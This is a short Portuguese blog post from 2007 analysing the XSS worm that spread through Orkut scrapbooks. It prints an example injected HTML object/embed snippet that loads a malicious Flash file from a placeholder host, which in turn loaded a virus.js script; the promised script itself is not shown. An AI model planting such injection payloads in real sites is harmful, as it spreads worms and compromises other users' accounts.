sábado, dezembro 22, 2007

Orkut - Análise da falha XSS

Tal como prometido vou mostrar aqui o fucionamento do worm que infectou o Orkut aproveitando-se de uma falha entrentanto já corrigida pela Google.

Na realidade este worm não passava de código Javascript que se espalhava pelos profiles que chegassem até aos scraps (scrapbook) já alterados para contaminar.

O funcionamento era o seguinte:

Era colocado num scrap um post com HTML a embeber um objecto flash malicioso, por exemplo:

<object width="425" height="355"><param name="movie"
value="http://xpto.com/flash_malicioso.swf">
</param><param name="wmode" value="transparent">
</param><embed src="http://xpto.com/flash_malicioso.swf"
type="application/x-shockwave-flash"
wmode="transparent');>

Por sua vez, o flash carregava um ficheiro Javascript de seu nome virus.js que iria então efectuar os restantes "estragos", nomeadamente registar a vítima no grupo "Infectados Pelo Vírus do Orkut" e ainda mostrava uma mensagem sugestiva.

Aqui fica o código do virus.js para poderem verificar como é simples efectuar estes ataques. E apesar de XSS ser considerado um ataque menos creditado e associado a script-kiddies, a verdade é que são eficazes e podem provocar bastantes estragos, é só querer.